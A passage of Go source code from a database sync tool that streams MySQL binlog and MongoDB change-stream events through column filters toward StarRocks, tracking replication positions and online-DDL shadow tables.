msg.DmlMsg.Data[column] 69 | delete(msg.DmlMsg.Data, column) 70 | } 71 | } 72 | } 73 | return false 74 | } 75 | -------------------------------------------------------------------------------- /pkg/filter/interface.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 5 | ) 6 | 7 | type Filter interface { 8 | NewFilter(config map[string]interface{}) error 9 | Filter(msg *msg.Msg) bool 10 | } 11 | -------------------------------------------------------------------------------- /pkg/filter/matcher.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 9 | "github.com/siddontang/go-log/log" 10 | ) 11 | 12 | type MatcherFilter []Filter 13 | 14 | func NewMatcherFilter(filterConfigs []*config.FilterConfig) MatcherFilter { 15 | var matcher MatcherFilter 16 | for _, fc := range filterConfigs { 17 | switch typ := fc.Type; typ { 18 | case DeleteDMLColumnFilterName: 19 | ddcf := &DeleteDmlColumnFilter{} 20 | if err := ddcf.NewFilter(fc.Config); err != nil { 21 | log.Fatal(err) 22 | } 23 | matcher = append(matcher, ddcf) 24 | case ConvertDmlColumnFilterName: 25 | cdcf := &ConvertDmlColumnFilter{} 26 | if err := cdcf.NewFilter(fc.Config); err != nil { 27 | log.Fatal(err) 28 | } 29 | matcher = append(matcher, cdcf) 30 | case ConvertSnakeCaseColumnFilterName: 31 | cscf := &ConvertSnakeCaseColumnFilter{} 32 | if err := cscf.NewFilter(fc.Config); err != nil { 33 | log.Fatal(err) 34 | } 35 | matcher = append(matcher, cscf) 36 | case RenameDmlColumnFilterName: 37 | rdcf := &RenameDmlColumnFilter{} 38 | if err := rdcf.NewFilter(fc.Config); err != nil { 39 | log.Fatal(err) 40 | } 41 | matcher = append(matcher, rdcf) 42 | case JsDmlColumnFilterName: 43 | jdcf := &JsDmlColumnFilter{} 44 | if err := jdcf.NewFilter(fc.Config); err != nil { 45 | log.Fatal(err) 46 | } 47 | matcher = append(matcher, jdcf) 48 | default: 49 | log.Warnf("filter: %s unhandled will not take effect.", typ) 50 | } 51 | } 52 | return matcher 53 | } 54 | 55 | func (matcher MatcherFilter) IterateFilter(msg *msg.Msg) bool { 56 | for _, filter := range matcher { 57 | if filter.Filter(msg) { 58 | log.Debugf("filter msg %v", msg.DmlMsg.Data) 59 | return true 60 | } 61 | } 62 | return false 63 | } 64 | 65 | func (matcher MatcherFilter) StartFilter(syncChan *channel.SyncChannel, outputChan *channel.OutputChannel, inSchema core.Schema) { 66 | // 消费syncChan 67 | go func() { 68 | for { 69 | select { 70 | case v := <-syncChan.SyncChan: 71 | switch data := v.(type) { 72 | case *msg.Msg: 73 | // 过滤syncChan 74 | if !matcher.IterateFilter(data) { 75 | // 写入outputChan 76 | outputChan.SyncChan <- data 77 | 78 | if data.Type == msg.MsgDML { 79 | // prom read event number counter 80 | metrics.OpsReadProcessed.Inc() 81 | if data.PluginName == msg.MongoPlugin { 82 | // add table cache for mongo 83 | err := inSchema.AddTableForMsg(data) 84 | if err != nil { 85 | log.Fatalf("add table meta for msg missing: %v", data) 86 | } 87 | } 88 | } 89 | } 90 | } 91 | case <-syncChan.Done: 92 | log.Infof("close syncChan filter goroutine.") 93 | log.Infof("close input sync chan.") 94 | return 95 | } 96 | } 97 | }() 98 | } 99 | -------------------------------------------------------------------------------- /pkg/filter/utils.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | func FindColumn(data map[string]interface{}, name string) interface{} { 4 | if value, ok := data[name]; ok { 5 | return value 6 | } 7 | return nil 8 | } 9 | -------------------------------------------------------------------------------- /pkg/input/ip_mongo.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/position" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 15 | "github.com/mitchellh/mapstructure" 16 | "github.com/siddontang/go-log/log" 17 | "go.mongodb.org/mongo-driver/bson/primitive" 18 | "go.mongodb.org/mongo-driver/mongo" 19 | "go.mongodb.org/mongo-driver/mongo/options" 20 | "regexp" 21 | "sync" 22 | "sync/atomic" 23 | "time" 24 | ) 25 | 26 | type MongoInputPlugin struct { 27 | *config.MongoConfig 28 | Client *mongo.Client 29 | ChangeStream *mongo.ChangeStream 30 | syncChan *channel.SyncChannel 31 | position core.Position 32 | includeTableRegexLock sync.RWMutex 33 | includeTableRegex []*regexp.Regexp 34 | delay *uint32 35 | wg sync.WaitGroup 36 | ctx context.Context 37 | cancel context.CancelFunc 38 | } 39 | 40 | type mongoInputContext struct { 41 | Id *msg.WatchId `bson:"_id"` 42 | } 43 | 44 | type streamObject struct { 45 | Id *msg.WatchId `bson:"_id"` 46 | OperationType msg.ActionType 47 | FullDocument map[string]interface{} 48 | Ns NS 49 | UpdateDescription map[string]interface{} 50 | DocumentKey map[string]interface{} 51 | ClusterTime primitive.Timestamp 52 | } 53 | 54 | type NS struct { 55 | Database string `bson:"db"` 56 | Collection string `bson:"coll"` 57 | } 58 | 59 | const MongoName = "mongo" 60 | 61 | func init() { 62 | registry.RegisterPlugin(registry.InputPlugin, MongoName, &MongoInputPlugin{}) 63 | } 64 | 65 | func (mi *MongoInputPlugin) Configure(pipelineName string, configInput map[string]interface{}) error { 66 | mi.MongoConfig = &config.MongoConfig{} 67 | var source = configInput["source"] 68 | err := mapstructure.Decode(source, mi.MongoConfig) 69 | if err != nil { 70 | log.Fatal("input.source config parsing failed. err: %v", err.Error()) 71 | } 72 | return nil 73 | } 74 | 75 | func (mi *MongoInputPlugin) NewInput(inputConfig interface{}, ruleRegex []string, inSchema core.Schema) { 76 | mi.ctx, mi.cancel = context.WithCancel(context.Background()) 77 | 78 | uri := fmt.Sprintf("mongodb://%s:%s@%s", mi.UserName, mi.Password, mi.Uri) 79 | // client初始化 80 | client, err := mongo.Connect(context.TODO(), options.Client().ApplyURI(uri)) 81 | if err != nil { 82 | log.Fatal(err) 83 | } 84 | log.Infof("init mongo client") 85 | mi.Client = client 86 | mi.includeTableRegex = mi.checkTableRegex(ruleRegex) 87 | mi.delay = new(uint32) 88 | } 89 | 90 | func (mi *MongoInputPlugin) StartInput(pos core.Position, syncChan *channel.SyncChannel) core.Position { 91 | var mongoPos = &position.MongoPosition{} 92 | if err := mapstructure.Decode(pos, mongoPos); err != nil { 93 | log.Fatalf("mongo position parsing failed. err: %s", err.Error()) 94 | } 95 | 96 | opts := options.ChangeStream().SetFullDocument(options.UpdateLookup) 97 | if mongoPos.ResumeTokens.Data != "" { 98 | // 指定token启动change stream 99 | opts.SetResumeAfter(mongoPos.ResumeTokens) 100 | } else if !mongoPos.InitStartPosition.IsZero() { 101 | // 指定时间戳启动change stream 102 | t := &primitive.Timestamp{T: uint32(mongoPos.InitStartPosition.Unix()), I: 1} 103 | opts.SetStartAtOperationTime(t) 104 | } 105 | 106 | log.Infof("start change stream") 107 | 108 | changeStream, err := mi.Client.Watch(context.TODO(), mongo.Pipeline{}, opts) 109 | if err != nil { 110 | log.Fatal(err) 111 | } 112 | 113 | // assign value 114 | mi.syncChan = syncChan 115 | mi.ChangeStream = changeStream 116 | 117 | log.Infof("start change stream successfully") 118 | log.Infof("iterate over the cursor to handle the change-stream events") 119 | 120 | if mongoPos.ResumeTokens.Data == "" { 121 | log.Infof("iterate first cursor get init resumeToken value for save position") 122 | firstResumeToken := mi.getFirstResumeToken() 123 | if err := mongoPos.ModifyPosition(firstResumeToken); err != nil { 124 | log.Fatalf("first position save failed: %v", err.Error()) 125 | } 126 | } 127 | 128 | // iterate over the cursor to print the change-stream events 129 | go func() { 130 | for mi.ChangeStream.Next(context.TODO()) { 131 | mi.msgHandle() 132 | } 133 | }() 134 | 135 | if err := mi.ChangeStream.Err(); err != nil { 136 | if err := mi.ChangeStream.Close(context.TODO()); err != nil { 137 | log.Fatal(err) 138 | } 139 | log.Fatal(err) 140 | } 141 | 142 | mi.position = mongoPos 143 | 144 | // Start metrics 145 | mi.StartMetrics() 146 | 147 | return mongoPos 148 | } 149 | 150 | func (mi *MongoInputPlugin) StartMetrics() { 151 | mi.promTimingMetrics() 152 | } 153 | 154 | func (mi *MongoInputPlugin) Close() { 155 | if err := mi.ChangeStream.Close(context.TODO()); err != nil { 156 | log.Fatal(err) 157 | } 158 | log.Infof("close mongo change stream.") 159 | mi.cancel() 160 | mi.wg.Wait() 161 | log.Infof("close mongo input metrics.") 162 | } 163 | 164 | func (mi *MongoInputPlugin) SetIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 165 | mi.includeTableRegexLock.Lock() 166 | defer mi.includeTableRegexLock.Unlock() 167 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 168 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 169 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 170 | if err != nil { 171 | return reg, err 172 | } 173 | // if exists, return 174 | for _, regex := range mi.includeTableRegex { 175 | if regex.String() == reg.String() { 176 | return reg, errors.New("table rule already exists.") 177 | } 178 | } 179 | mi.includeTableRegex = append(mi.includeTableRegex, reg) 180 | return reg, nil 181 | } 182 | 183 | func (mi *MongoInputPlugin) RemoveIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 184 | mi.includeTableRegexLock.Lock() 185 | defer mi.includeTableRegexLock.Unlock() 186 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 187 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 188 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 189 | if err != nil { 190 | return reg, err 191 | } 192 | // if exists remove 193 | for i, regex := range mi.includeTableRegex { 194 | if regex.String() == reg.String() { 195 | mi.includeTableRegex = append(mi.includeTableRegex[:i], mi.includeTableRegex[i+1:]...) 196 | return reg, nil 197 | } 198 | } 199 | return reg, errors.New("table rule not exists.") 200 | } 201 | 202 | func (mi *MongoInputPlugin) msgHandle() { 203 | var event = &streamObject{} 204 | if err := mi.ChangeStream.Decode(event); err != nil { 205 | log.Fatal(err) 206 | } 207 | 208 | mi.setDelay(event) 209 | 210 | // 默认过滤drop事件 211 | if event.OperationType == "drop" { 212 | mi.onRowCtl(event) 213 | return 214 | } 215 | 216 | // rule table match 217 | if mi.checkTableMatch(event) { 218 | mi.onRowCtl(event) 219 | return 220 | } 221 | 222 | mi.onRow(event) 223 | mi.onRowCtl(event) // for commit msg callback, modify position 224 | } 225 | 226 | func (mi *MongoInputPlugin) onRow(e *streamObject) { 227 | m := mi.eventPreProcessing(e) 228 | mi.syncChan.SyncChan <- m 229 | } 230 | 231 | func (mi *MongoInputPlugin) onRowCtl(e *streamObject) { 232 | ctlMsg := &msg.Msg{ 233 | Type: msg.MsgCtl, 234 | PluginName: msg.MongoPlugin, 235 | InputContext: &mongoInputContext{Id: e.Id}, 236 | AfterCommitCallback: mi.AfterMsgCommit, 237 | } 238 | mi.syncChan.SyncChan <- ctlMsg 239 | } 240 | 241 | func (mi *MongoInputPlugin) eventPreProcessing(e *streamObject) *msg.Msg { 242 | var dataMsg = &msg.Msg{ 243 | Database: e.Ns.Database, 244 | Table: e.Ns.Collection, 245 | Type: msg.MsgDML, 246 | DmlMsg: &msg.DMLMsg{}, 247 | ResumeToken: e.Id, 248 | Timestamp: time.Unix(int64(e.ClusterTime.T), int64(0)), 249 | PluginName: msg.MongoPlugin, 250 | } 251 | 252 | switch e.OperationType { 253 | case msg.InsertAction: 254 | dataMsg.DmlMsg.Action = msg.InsertAction 255 | dataMsg.DmlMsg.Data = e.FullDocument 256 | case msg.UpdateAction: 257 | dataMsg.DmlMsg.Action = msg.UpdateAction 258 | if e.FullDocument == nil { 259 | dataMsg.DmlMsg.Data = e.DocumentKey 260 | for key := range e.UpdateDescription { 261 | if key == "updatedFields" { 262 | updatedFields := e.UpdateDescription["updatedFields"].(map[string]interface{}) 263 | for updKey := range updatedFields { 264 | dataMsg.DmlMsg.Data[updKey] = updatedFields[updKey] 265 | } 266 | break 267 | } 268 | } 269 | } else { 270 | dataMsg.DmlMsg.Data = e.FullDocument 271 | } 272 | case msg.DeleteAction: 273 | dataMsg.DmlMsg.Action = msg.DeleteAction 274 | dataMsg.DmlMsg.Data = e.DocumentKey 275 | case msg.ReplaceAction: 276 | dataMsg.DmlMsg.Action = msg.ReplaceAction 277 | dataMsg.DmlMsg.Data = e.FullDocument 278 | default: 279 | log.Fatalf("unhandled message type: %s", e) 280 | } 281 | log.Debugf("msg event: %s %s.%s %v", e.OperationType, e.Ns.Database, e.Ns.Collection, dataMsg.DmlMsg.Data) 282 | return dataMsg 283 | } 284 | 285 | func (mi *MongoInputPlugin) AfterMsgCommit(msg *msg.Msg) error { 286 | ctx := msg.InputContext.(*mongoInputContext) 287 | if ctx.Id.Data != "" { 288 | if err := mi.position.ModifyPosition(ctx.Id.Data); err != nil { 289 | return errors.Trace(err) 290 | } 291 | } 292 | 293 | return nil 294 | } 295 | 296 | func (mi *MongoInputPlugin) promTimingMetrics() { 297 | mi.wg.Add(1) 298 | go func() { 299 | defer mi.wg.Done() 300 | ticker := time.NewTicker(time.Second * 3) 301 | defer ticker.Stop() 302 | 303 | for { 304 | select { 305 | case <-ticker.C: 306 | // prom sync delay set 307 | metrics.DelayReadTime.Set(float64(mi.GetDelay())) 308 | case <-mi.ctx.Done(): 309 | return 310 | } 311 | } 312 | }() 313 | } 314 | 315 | func (mi *MongoInputPlugin) setDelay(e *streamObject) { 316 | var newDelay uint32 317 | now := uint32(time.Now().Unix()) 318 | if now >= e.ClusterTime.T { 319 | newDelay = now - e.ClusterTime.T 320 | } 321 | atomic.StoreUint32(mi.delay, newDelay) 322 | } 323 | 324 | func (mi *MongoInputPlugin) GetDelay() uint32 { 325 | return atomic.LoadUint32(mi.delay) 326 | } 327 | 328 | func (mi *MongoInputPlugin) checkTableRegex(ruleRegex []string) []*regexp.Regexp { 329 | if n := len(ruleRegex); n > 0 { 330 | includeTableRegex := make([]*regexp.Regexp, n) 331 | for i, val := range ruleRegex { 332 | reg, err := regexp.Compile(val) 333 | if err != nil { 334 | log.Fatal(err) 335 | } 336 | includeTableRegex[i] = reg 337 | } 338 | return includeTableRegex 339 | } 340 | return nil 341 | } 342 | 343 | func (mi *MongoInputPlugin) checkTableMatch(e *streamObject) bool { 344 | matchFlag := true 345 | key := fmt.Sprintf("%s.%s", e.Ns.Database, e.Ns.Collection) 346 | // check include 347 | if mi.includeTableRegex != nil { 348 | for _, reg := range mi.includeTableRegex { 349 | if reg.MatchString(key) { 350 | matchFlag = false 351 | break 352 | } 353 | } 354 | } 355 | return matchFlag 356 | } 357 | 358 | func (mi *MongoInputPlugin) getFirstResumeToken() string { 359 | for mi.ChangeStream.Next(context.TODO()) { 360 | mi.msgHandle() 361 | return mi.ChangeStream.ResumeToken().Index(0).Value().StringValue() 362 | } 363 | return "" 364 | } 365 | -------------------------------------------------------------------------------- /pkg/input/ip_mysql.go: -------------------------------------------------------------------------------- 1 | package input 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/canal" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | "github.com/go-mysql-org/go-mysql/replication" 9 | "github.com/juju/errors" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/position" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 17 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 18 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 19 | "github.com/mitchellh/mapstructure" 20 | "github.com/pingcap/tidb/pkg/parser" 21 | "github.com/siddontang/go-log/log" 22 | "regexp" 23 | "sync" 24 | "time" 25 | ) 26 | 27 | type MysqlInputPlugin struct { 28 | canal.DummyEventHandler 29 | *config.MysqlConfig 30 | canalConfig *canal.Config 31 | syncChan *channel.SyncChannel 32 | canal *canal.Canal 33 | position core.Position 34 | inSchema core.Schema 35 | parser *parser.Parser 36 | syncPosition *position.MysqlBasePosition 37 | ctlMsgFlushPosition *position.MysqlBasePosition // only ddl before handle 38 | wg sync.WaitGroup 39 | ctx context.Context 40 | cancel context.CancelFunc 41 | } 42 | 43 | const MysqlName = "mysql" 44 | 45 | func init() { 46 | registry.RegisterPlugin(registry.InputPlugin, MysqlName, &MysqlInputPlugin{}) 47 | } 48 | 49 | func (mi *MysqlInputPlugin) Configure(pipelineName string, configInput map[string]interface{}) error { 50 | mi.MysqlConfig = &config.MysqlConfig{} 51 | var source = configInput["source"] 52 | err := mapstructure.Decode(source, mi.MysqlConfig) 53 | if err != nil { 54 | log.Fatal("input.source config parsing failed. err: %v", err.Error()) 55 | } 56 | return nil 57 | } 58 | 59 | func (mi *MysqlInputPlugin) NewInput(inputConfig interface{}, ruleRegex []string, inSchema core.Schema) { 60 | mi.ctx, mi.cancel = context.WithCancel(context.Background()) 61 | // 初始化canal配置 62 | cfg := canal.NewDefaultConfig() 63 | cfg.Addr = fmt.Sprintf("%s:%d", mi.MysqlConfig.Host, mi.MysqlConfig.Port) 64 | cfg.User = mi.MysqlConfig.UserName 65 | cfg.Password = mi.MysqlConfig.Password 66 | cfg.Dump.ExecutionPath = "" // ignore mysqldump, use binlog only 67 | cfg.IncludeTableRegex = ruleRegex 68 | // cfg.Logger = &log.Logger{} 69 | mi.canalConfig = cfg 70 | mi.inSchema = inSchema 71 | mi.parser = parser.New() 72 | mi.ctlMsgFlushPosition = &position.MysqlBasePosition{BinlogName: "", BinlogPos: 0, BinlogGTID: ""} 73 | } 74 | 75 | func (mi *MysqlInputPlugin) StartInput(pos core.Position, syncChan *channel.SyncChannel) core.Position { 76 | // 初始化canal 77 | c, err := canal.NewCanal(mi.canalConfig) 78 | if err != nil { 79 | log.Fatal(err) 80 | } 81 | mi.canal = c 82 | 83 | // Register a handler to handle RowsEvent 84 | c.SetEventHandler(mi) 85 | 86 | var mysqlPos = &position.MysqlPosition{} 87 | if err := mapstructure.Decode(pos, mysqlPos); err != nil { 88 | log.Fatalf("mysql position parsing failed. err: %s", err.Error()) 89 | } 90 | 91 | var gs mysql.GTIDSet 92 | if mysqlPos.BinlogGTID != "" { 93 | if gs, err = mysql.ParseGTIDSet("mysql", mysqlPos.BinlogGTID); err != nil { 94 | log.Fatal(err) 95 | } 96 | } else { 97 | log.Infof("load 'binlog-gtid' from db not exist") 98 | log.Infof("config file [input] param 'start-gtid' not exist") 99 | log.Infof("start get the current 'binlog-gtid' value") 100 | if gs, err = c.GetMasterGTIDSet(); err != nil { 101 | log.Fatal(err) 102 | } 103 | if gs.String() == "" { 104 | log.Fatal("the gtid value is empty, please confirm whether to enable gtid!") 105 | } 106 | mysqlPos.BinlogGTID = gs.String() 107 | if err := mysqlPos.SavePosition(); err != nil { 108 | log.Fatal(err) 109 | } 110 | } 111 | // assign value 112 | mi.syncChan = syncChan 113 | mi.position = mysqlPos 114 | mi.syncPosition = &position.MysqlBasePosition{BinlogName: mysqlPos.BinlogName, BinlogPos: mysqlPos.BinlogPos, BinlogGTID: mysqlPos.BinlogGTID} 115 | 116 | // init first ctl, bug fix start large transactions 117 | ctlMsg := &msg.Msg{ 118 | Type: msg.MsgCtl, 119 | PluginName: msg.MysqlPlugin, 120 | InputContext: &inputContext{ // last sync position 121 | BinlogName: mi.syncPosition.BinlogName, 122 | BinlogPos: mi.syncPosition.BinlogPos, 123 | BinlogGTID: mi.syncPosition.BinlogGTID, 124 | force: true}, 125 | AfterCommitCallback: mi.AfterMsgCommit, 126 | } 127 | mi.syncChan.SyncChan <- ctlMsg 128 | 129 | // Start canal 130 | go func() { 131 | err := c.StartFromGTID(gs) 132 | if err != nil { 133 | log.Fatal(err) 134 | } 135 | }() 136 | 137 | // Start metrics 138 | mi.StartMetrics() 139 | 140 | return mysqlPos 141 | } 142 | 143 | func (mi *MysqlInputPlugin) StartMetrics() { 144 | mi.promTimingMetrics() 145 | } 146 | 147 | func (mi *MysqlInputPlugin) Close() { 148 | mi.canal.Close() 149 | log.Infof("close mysql input canal.") 150 | mi.cancel() 151 | mi.wg.Wait() 152 | log.Infof("close mysql input metrics.") 153 | } 154 | 155 | func (mi *MysqlInputPlugin) SetIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 156 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 157 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 158 | cacheKey := fmt.Sprintf("%v.%v", sourceSchema, sourceTable) 159 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 160 | if err != nil { 161 | return reg, err 162 | } 163 | 164 | _, err = mi.canal.AddIncludeTableRegex(cacheKey, reg) 165 | if err != nil { 166 | return reg, err 167 | } 168 | return reg, nil 169 | } 170 | 171 | func (mi *MysqlInputPlugin) RemoveIncludeTableRegex(config map[string]interface{}) (*regexp.Regexp, error) { 172 | sourceSchema := fmt.Sprintf("%v", config["source-schema"]) 173 | sourceTable := fmt.Sprintf("%v", config["source-table"]) 174 | cacheKey := fmt.Sprintf("%v.%v", sourceSchema, sourceTable) 175 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(sourceSchema, sourceTable)) 176 | if err != nil { 177 | return reg, err 178 | } 179 | 180 | _, err = mi.canal.DelIncludeTableRegex(cacheKey, reg) 181 | if err != nil { 182 | return reg, err 183 | } 184 | return reg, nil 185 | } 186 | 187 | func (mi *MysqlInputPlugin) OnRow(e *canal.RowsEvent) error { 188 | msgs := mi.eventPreProcessing(e) 189 | for _, m := range msgs { 190 | mi.syncChan.SyncChan <- m 191 | } 192 | return nil 193 | } 194 | 195 | func (mi *MysqlInputPlugin) OnTableChanged(schema string, table string) error { 196 | // onDDL before 197 | // send flush data msg 198 | // mi.syncChan.SyncChan <- ctlMsg 199 | ctlMsg := &msg.Msg{ 200 | Type: msg.MsgCtl, 201 | PluginName: msg.MysqlPlugin, 202 | InputContext: &inputContext{ // last sync position 203 | BinlogName: mi.syncPosition.BinlogName, 204 | BinlogPos: mi.syncPosition.BinlogPos, 205 | BinlogGTID: mi.syncPosition.BinlogGTID, 206 | force: true}, 207 | AfterCommitCallback: mi.AfterMsgCommit, 208 | } 209 | mi.syncChan.SyncChan <- ctlMsg 210 | 211 | // waiting flush data msgs... 212 | // if syncPosition gitd == ctlMsgFlushPosition gitd indicates that flush is complete 213 | for true { 214 | if mi.ctlMsgFlushPosition.BinlogGTID != "" { 215 | if mi.syncPosition.BinlogGTID == mi.ctlMsgFlushPosition.BinlogGTID { 216 | break 217 | } 218 | } 219 | time.Sleep(time.Second * 1) 220 | } 221 | return nil 222 | } 223 | 224 | func (mi *MysqlInputPlugin) OnPosSynced(pos mysql.Position, set mysql.GTIDSet, force bool) error { 225 | ctlMsg := &msg.Msg{ 226 | Type: msg.MsgCtl, 227 | PluginName: msg.MysqlPlugin, 228 | InputContext: &inputContext{BinlogName: pos.Name, BinlogPos: pos.Pos, BinlogGTID: set.String(), force: false}, 229 | AfterCommitCallback: mi.AfterMsgCommit, 230 | } 231 | mi.syncChan.SyncChan <- ctlMsg 232 | mi.syncPosition.BinlogName = pos.Name 233 | mi.syncPosition.BinlogPos = pos.Pos 234 | mi.syncPosition.BinlogGTID = set.String() 235 | return nil 236 | } 237 | 238 | func (mi *MysqlInputPlugin) OnDDL(nextPos mysql.Position, queryEvent *replication.QueryEvent) error { 239 | gtid := queryEvent.GSet.String() 240 | db := string(queryEvent.Schema) 241 | ddl := string(queryEvent.Query) 242 | ddlStmts, err := schema.DdlToDdlStatements(ddl, db) 243 | if err != nil { 244 | log.Fatalf("parse query(%s) err %v", queryEvent.Query, err) 245 | } 246 | log.Debugf("ddl event: %v", ddl) 247 | for nsIndex, ddlStmt := range ddlStmts { 248 | // filter meta db _go_mysql_sr 249 | if ddlStmt.Schema == position.DbName { 250 | continue 251 | } 252 | 253 | // schema table reg 254 | reg, err := regexp.Compile(rule.SchemaTableToStrRegex(ddlStmt.Schema, ddlStmt.Name)) 255 | if err != nil { 256 | log.Fatalf("parse schema table regexp err %v", err.Error()) 257 | } 258 | 259 | isHandleDDL := false 260 | for _, regex := range mi.canal.GetIncludeTableRegex() { 261 | if regex.String() == reg.String() { 262 | isHandleDDL = true 263 | break 264 | } 265 | 266 | regexToSchema, regexToTable := rule.StrRegexToSchemaTable(regex.String()) 267 | // aliyun dms online ddl reg 268 | aliyunDMSOnlineDdlRegStr := fmt.Sprintf("^tp_\\d+_(ogt|del|ogl)_%s$", regexToTable) 269 | aliyunDMSOnlineDdlReg, err := regexp.Compile(aliyunDMSOnlineDdlRegStr) 270 | if err != nil { 271 | log.Fatalf("parse aliyun dms online ddl regexp err %v", err.Error()) 272 | } 273 | // aliyun dms online ddl reg2 274 | aliyunDMSOnlineDdlReg2Str := fmt.Sprintf("^tpa_[a-z0-9]+_%v$", regexToTable) 275 | aliyunDMSOnlineDdlReg2, err := regexp.Compile(aliyunDMSOnlineDdlReg2Str) 276 | if err != nil { 277 | log.Fatalf("parse aliyun dms online ddl regexp err %v", err.Error()) 278 | } 279 | // gh-ost online ddl reg 280 | ghostOnlineDdlRegStr := fmt.Sprintf("^_%s_(gho|ghc|del)$", regexToTable) 281 | ghostOnlineDdlReg, err := regexp.Compile(ghostOnlineDdlRegStr) 282 | if err != nil { 283 | log.Fatalf("parse gh-ost online ddl regexp err %v", err.Error()) 284 | } 285 | if ddlStmt.Schema == regexToSchema && 286 | (aliyunDMSOnlineDdlReg.MatchString(ddlStmt.Name) || 287 | aliyunDMSOnlineDdlReg2.MatchString(ddlStmt.Name) || 288 | ghostOnlineDdlReg.MatchString(ddlStmt.Name)) { 289 | isHandleDDL = true 290 | break 291 | } 292 | } 293 | 294 | if isHandleDDL { 295 | log.Infof("handle ddl event: %v", ddlStmt.RawSql) 296 | err = mi.inSchema.UpdateTable(ddlStmt.Schema, ddlStmt.Name, ddlStmt.RawSql, gtid, nsIndex) 297 | if err != nil { 298 | log.Errorf("handle query(%s) err %v", queryEvent.Query, err) 299 | } 300 | } else { 301 | log.Debugf("filter ddl event, ddl non-sync table, ddl: %v", ddl) 302 | } 303 | } 304 | return nil 305 | } 306 | 307 | func (mi *MysqlInputPlugin) eventPreProcessing(e *canal.RowsEvent) []*msg.Msg { 308 | var msgs []*msg.Msg 309 | if e.Action == canal.InsertAction { 310 | for _, row := range e.Rows { 311 | data := make(map[string]interface{}) 312 | 313 | if len(row) != len(e.Table.Columns) { 314 | columns := make([]string, 0, 16) 315 | for _, column := range e.Table.Columns { 316 | columns = append(columns, column.Name) 317 | } 318 | log.Warnf("insert %s.%s columns and data mismatch in length: %d vs %d, table %v", 319 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row), columns) 320 | log.Infof("load table:%s.%s meta columns from local", e.Table.Schema, e.Table.Name) 321 | ta, err := mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 322 | if err != nil { 323 | log.Fatalf("get tables failed, err: %v", err.Error()) 324 | } 325 | if len(row) != len(ta.Columns) { 326 | log.Warnf("insert %s.%s columns and data mismatch in local length: %d vs %d, table %v", 327 | e.Table.Schema, e.Table.Name, len(ta.Columns), len(row), ta.GetTableColumnsName()) 328 | } 329 | for j := 0; j < len(row); j++ { 330 | data[ta.Columns[j].Name] = deserializeForLocal(row[j], ta.Columns[j]) 331 | } 332 | } else { 333 | for j := 0; j < len(row); j++ { 334 | data[e.Table.Columns[j].Name] = deserialize(row[j], e.Table.Columns[j]) 335 | } 336 | } 337 | 338 | log.Debugf("msg event: %s %s.%s %v\n", e.Action, e.Table.Schema, e.Table.Name, data) 339 | msgs = append(msgs, &msg.Msg{ 340 | Table: e.Table.Name, 341 | Database: e.Table.Schema, 342 | Type: msg.MsgDML, 343 | DmlMsg: &msg.DMLMsg{Action: msg.InsertAction, Data: data}, 344 | Timestamp: time.Unix(int64(e.Header.Timestamp), 0), 345 | PluginName: msg.MysqlPlugin, 346 | }) 347 | 348 | } 349 | return msgs 350 | } 351 | if e.Action == canal.UpdateAction { 352 | for i, row := range e.Rows { 353 | if i%2 == 0 { 354 | continue 355 | } 356 | data := make(map[string]interface{}) 357 | old := make(map[string]interface{}) 358 | 359 | if len(row) != len(e.Table.Columns) { 360 | columns := make([]string, 0, 16) 361 | for _, column := range e.Table.Columns { 362 | columns = append(columns, column.Name) 363 | } 364 | log.Warnf("update %s.%s columns and data mismatch in length: %d vs %d, table %v", 365 | e.Table.Schema, e.Table.Name, len(e.Table.Columns), len(row), columns) 366 | log.Infof("load table:%s.%s meta columns from local", e.Table.Schema, e.Table.Name) 367 | ta, err := mi.inSchema.GetTable(e.Table.Schema, e.Table.Name) 368 | if err != nil { 369 | log.Fatalf("get tables 